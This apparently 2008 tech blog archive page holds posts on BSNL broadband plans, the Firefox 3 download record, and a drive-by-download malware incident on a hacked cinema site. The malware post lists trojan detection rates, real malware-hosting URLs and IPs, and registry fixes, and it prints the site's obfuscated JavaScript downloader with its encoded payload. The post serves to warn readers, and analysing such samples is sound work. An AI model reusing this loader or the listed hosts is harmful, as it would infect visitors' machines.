Jul 16, 2008

Breedband for Rs125/- only

Focus of the post:- BSNL  broadband for Rs125**

BSNL Plan Advisor:-
BSNL Home 125 - I want you Naked
BSNL Home 250 - Empty your pockets
BSNL Home 500 - One Night at Call Centre
BSNL UL 750 - Hit Me 
BSNL Home 1000 - Out of Mind
BSNL Home 1800 - Inutile
BSNL Home 3300 - There are some plans money can't buy

Some popular sites designed for the plan:-
m.gmail.com
m.orkut.com
wap.yahoo.com
mobile.rediff.com
wap.google.com
bbc.co.uk/mobile
mosh.nokia.mobi


The plan was launched in the first quarter of 2008 .After getting an Airtel BB connection in Jan08 i never digged about broadband plans anymore and spotted this one through a Priety Zinta ad in Hindustan times.

Startup cost - Download limit is ridiculous at 150MB.It should have been 400-450MB plus you have to shed some extra amount for modem too.Airtel and Reliance gives you a free broadband modem and most of their plans are zero rental[pay only when you call].For most of the BSNL plans the total startup cost will be a little high if you dont plan to use the landline.There are only few plans with zero fixed monthly charges for telephone:-
  • Home 500 Combo   [DL - 1.5GB, 256kbps-2mbps]
  • Home UL 750 plus  [DL - Unlimited , 256kbps]
  • Home UL 1350 plus[DL - Unlimited , 512kbps]
DatanOne Tariff

Jul 11, 2008

3 mins of innocent browsing on the Wild Wild Web

Focus of the post:- Drive by downloads by malicious javascript and iframes tags.

Press the full screen button

The hacked page of cinema-systemsindia.com,self proclaimed india's leading cinemagazine leads to a couple a silent trojan downloads.At the time of writing the post the trojans arent detected by any of the major antivirus firms except NOD32 (scan).AVG AV with its Link Scanner completely fails here. Internet Explorer users get completely owned but google and Firefox 3 users are warned about the malicious content on the page



                                                                                                       
Using an updated antivirus system isnt a sufficient solution for a windows desktop system,the most surprising thing is that all the trojans downloaded from the hacked url were not detected by any of the major av's(scan1). The inbuilt heuristic scanning is pretty useless.
Malware Stats (Kaspersky names) 
havp2d.exe - 3/30 (-)  
tpzhzx.exe - 7/33 (-)  
svchddd.ex - 10/33 (Trojan-Spy.Win32.Zbot.dag)  
file.bat - 5/33 (Trojan-Proxy.Win32.Small.mu)  
lphcp1uj0egl5.exe - 8/33 (-)  
scchost.exe - 16/33 (Trojan-Proxy.Win32.Small.sl)  
index.exe - 11/33 - (-)  
blphct1lj0ec4c.scr - 6/33(-)  
phcp1uj0egl5.bmp - 3/33 (-)
winlogon.exe - 5/33 (Trojan-Proxy.Win32.Small.st)

Charitable IP's 
87.118.117.138/ho.php (Trojan-Downloader.JS.Iframe)  
neiron2009.com/check/vers155.php?q=1 (Trojan-Downloader.Win32.Winlagons.vb)

Google and Firefox 3 prevented the malicious loading of the url.  
The Google Diagnostic Page Stats on cinema-systemsindia.com page :- What happened when Google visited this site? Of the 33 pages we tested on the site over the past 90 days, 11 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 07/08/2008, and the last time suspicious content was found on this site was on 06/06/2008. Malicious software includes 12 trojan(s). Successful infection resulted in an average of 7 new processes on the target machine. Malicious software is hosted on 3 domain(s), including sum4count.net, 78.109.30.0, try-count.net. 1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including gate4clicks.net.  

Spyware Wallpaper - The malware hides the wallpaper tab in Display Properties to prevent you from changing the wallapaper ,to bring it back make the following changes in registry:-


REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] 
"NoDispBackgroundPage"=dword:00000000

Fake Sysinternals Screensaver

A modified fake sysinternals Blue Screen of Death screensaver with progress bar is installed by the malware.To prevent you from changing the screensaver,the malware hides the screensaver tab in display properties.Make the following registry changes.
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] 
"NoDispScrSavPage"=dword:00000000

Malicious obfuscated Javascript,complete dissection of the url is here

function tdoban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,18,23,53,49,39,44,25,33,54,0,0,0,0,
0,0,9,2,46,21,56,42,26,48,35,6,1,17,16,24,30,58,3,4,43,12,51,61,27,37,14,29,32,0,0,0,0,38,0,8,5,20,60,47,28,52,7,45,19,2
2,31,55,36,10,15,41,13,11,50,59,62,34,57,40,0);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--)
{{w|=(t[x.charCodeAt(p++)-48])<>=8;s-=2}else{s=6}}}eval(r);
}}tdoban('bB@5k978fhy8jFD8Jvf399@52kYtk97nhvxWfFambAD_INq9Cud_cADnlNqgfXx52vfGIV@G2oYZzIxTLRq8IoatYmYWjFDWIhq5VI7_Jtr52F
MmI9YTC5UejFy_fPM5htqWF0unIE@mzX@5k9x5Fer9IjS4Qed972YGIV@G2kY9CPigbBqWIExTIpfG1RxWVkq_IvdGPh6gJFDwNNxTLVx_Joy5jBatf9@52A
rTXmU_cADnlN@TCer') 


Jul 4, 2008

Firefox lovers set Guinness World Record - Series of events

Focus of the post:-Series of events
  • Mozilla started a campaign on May 28 to set a Guinness World Record for the most number of software downloads in 24 hours with its Firefox 3 browser.Firefox community was asked to pledge to download the browser on the download day.
  • GOAL(Mozilla FAQ):Do we have to reach a specific number of downloads in order to set the record? This is the first record attempt of its kind so there is no set number. We'd really like to out do the number of Firefox 2 downloads on its launch day, which was 1.6 million. Let's shoot for 5 million--the sky is the limit!.
Mozilla enthusiasts worldwide drove more than 1.7 million pledges to download Firefox 3 on Download Day, hosted regional download “fests,”and informed more than 43 million people through hosting Download Day affiliate buttons online.

Firefox community email
  • The Mozilla servers were down for few hours on the download day.Read the minute by minute status update on CNET."Thanks to overwhelming demand we’ve passed through 14,000 downloads a minute! This will put us well into the tens of millions of downloads in a 24 hour period if we can sustain it. Each download is about 7MB so that’s around 13 Gigabits/s of just download traffic. Not too shabby!",the Mozilla site said.
The download day started on June 17,2008 17:00 UTC/GMT - 22:30 IST.->>
Firefox community email
  • Five hours after the release of Firefox 3,a security firm DV Labs/TippingPoint reported a critical vulnerability to Mozilla affecting affecting Firefox 3.0 as well as prior versions of Firefox 2.0.x. The vulnerability could allow an attacker to execute arbitrary code on visiting a malicious link.The same firm recently published an advisory related to Motorola RAZR JPG Processing Stack Overflow Vulnerability.The advisory will only be published once the vulnerability is patched by Mozilla.
  • At their busiest, the servers were handling more than 9,000 downloads per minute. Within five hours the number of downloads for version 3.0 exceeded the 1.6 million mark set by Firefox 2.0 in October 2006.
  • India download count too low @ 489,889 downloads for the download day.US @7,734,930;China @721,524;Iran @535,796;North Korea @000





      Firefox community email
      World Record Confirmed by Guinness on July 3,2008(Press Release):--->>"We did it! We set a Guinness World Record.Thanks to the support of the always amazing Mozilla community, we now hold a Guinness World Record for the most software downloaded in 24 hours. From 18:16 UTC on June 17, 2008 to 18:16 UTC on June 18, 2008, 8,002,530 people downloaded Firefox 3 and are now enjoying a safer, smarter and better Web"
      Mozilla FAQ about the validity of the record:-

      What does Mozilla have to provide Guinness to validate the record? We will provide the following:

      1. Signed statements of authentication from our judges showing that we've followed the rules and confirming our numbers.
      2. Video footage and photographs of our community members hosting Download Fests. Take pictures!!
      3. Download logs for a sample size of our downloads. We will internally host 10% of the downloads, retaining all of the logs for these downloads, and will use this as our sample set to extrapolate the actual download number and percentage of completed downloads.





      Firefox 3